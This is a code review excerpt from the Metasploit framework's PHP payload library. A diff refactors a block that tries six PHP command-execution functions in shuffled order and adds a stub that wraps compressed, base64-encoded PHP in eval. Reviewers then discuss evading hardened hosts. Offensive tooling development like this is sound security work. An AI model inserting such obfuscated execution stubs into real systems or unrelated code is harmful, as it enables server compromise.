lib/msf/core/payload/php.rb

```diff
@@ -128,17 +142,38 @@ def php_system_block(options = {})
     #		$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
     #		#{output} = file_get_contents('%TEMP%\\out.txt');
     #	}else"
-    fail_block = "
+    fail_block = <<~TEXT
       {
         #{output}=0;
       }
-    "
+    TEXT
 
     exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
     exec_methods = exec_methods.shuffle
-    buf = setup + exec_methods.join("") + fail_block
+    setup + exec_methods.join("") + fail_block
+  end
 
-    return buf
+  def php_system_block(options = {})
+    Msf::Payload::Php.system_block(options)
+  end
+
+  def php_exec_cmd(cmd)
+    vars = Rex::RandomIdentifier::Generator.new(language: :php)
+    <<-END_OF_PHP_CODE
+      #{php_preamble(vars_generator: vars)}
+      #{php_system_block(vars_generator: vars, cmd: cmd)}
+    END_OF_PHP_CODE
+  end
 
+  def self.create_exec_stub(php_code, options = {})
+    payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
+    b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));"
```

Comment:
Now that `base64_decode` is used in this payload, it might be worth providing a custom implementation, in case the functions isn't available (especially in an `eval` context) due to hardening.

Reply:
I think at that point, it'd also be worth while to get a solid solution for just properly escaping characters as necessary. It'd likely be harder for us to implement, but I think it'd result in smaller payloads then inflating them with base64 then including a base64 decoding routine.

In either case I think it'd make sense to take that on as a separate, dedicated work item and just maintain the reliance on base64 within this PR since enough things are changing.